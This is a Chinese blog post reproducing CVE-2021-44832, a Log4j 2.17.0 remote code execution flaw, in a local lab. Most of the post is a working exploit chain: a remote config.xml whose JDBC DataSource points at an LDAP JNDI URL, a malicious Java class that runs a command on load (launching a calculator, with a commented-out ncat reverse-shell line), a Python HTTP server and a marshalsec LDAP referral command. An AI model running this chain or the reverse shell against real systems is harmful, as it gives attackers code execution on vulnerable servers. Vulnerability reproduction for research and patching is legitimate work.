前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Log4j_2.17.0_RCE复现-CVE-2021-44832

Log4j_2.17.0_RCE复现-CVE-2021-44832

作者头像
UzJu@菜菜狗
发布2022-04-25 21:00:35
4180
发布2022-04-25 21:00:35
举报
文章被收录于专栏:UzJu和菜菜狗UzJu和菜菜狗

0x00 漏洞复现

image-20211230121331132
image-20211230121331132

还是使用Github上大佬的环境

https://github.com/tangxiaofeng7/apache-log4j-poc 不过这个好像已经删掉了:),还好之前本地存了

然后需要改一些配置文件,然后还有一个远程的config.xml

首先是新建一个远程的的config.xml

代码语言:javascript
复制
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/Exploit" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

随后需要一个恶意类

代码语言:javascript
复制
public class Exploit{
    static{
        System.err.println("Pwned");
        try{
            //            String[] cmd = {"ncat", "-e", "/bin/bash", "", "1234"};
            String[] cmd = {"open", "-a", "/System/Applications/Calculator.app"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        }catch(Exception e){
            e.printStackTrace();
        }
    }

然后Java编译成class,现在就可以在config和这个恶意类同目录下开启简单的Python http服务

  1. python3 -m http.server
image-20211230115354509
image-20211230115354509

随后需要修改一下代码,如下

代码语言:javascript
复制
 import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import java.util.*;
public class log4j {
    public static void main(String[] args) {
        System.setProperty("log4j2.configurationFile", "http://127.0.0.1:8888/config.xml");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        final Logger logger = LogManager.getLogger(log4j.class);
        Scanner sc = new Scanner(System.in);
        String str;
        while(true){
            str = sc.nextLine();
            logger.error(str);
        }
    }
}

然后开启marshalsec

代码语言:javascript
复制
java -cp marshalsec-0.0.-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit" 
image-20211230115526394
image-20211230115526394

随后直接运行即可

image-20211230115710248
image-20211230115710248

0x01 参考与原理

1、https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 漏洞复现
  • 0x01 参考与原理
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档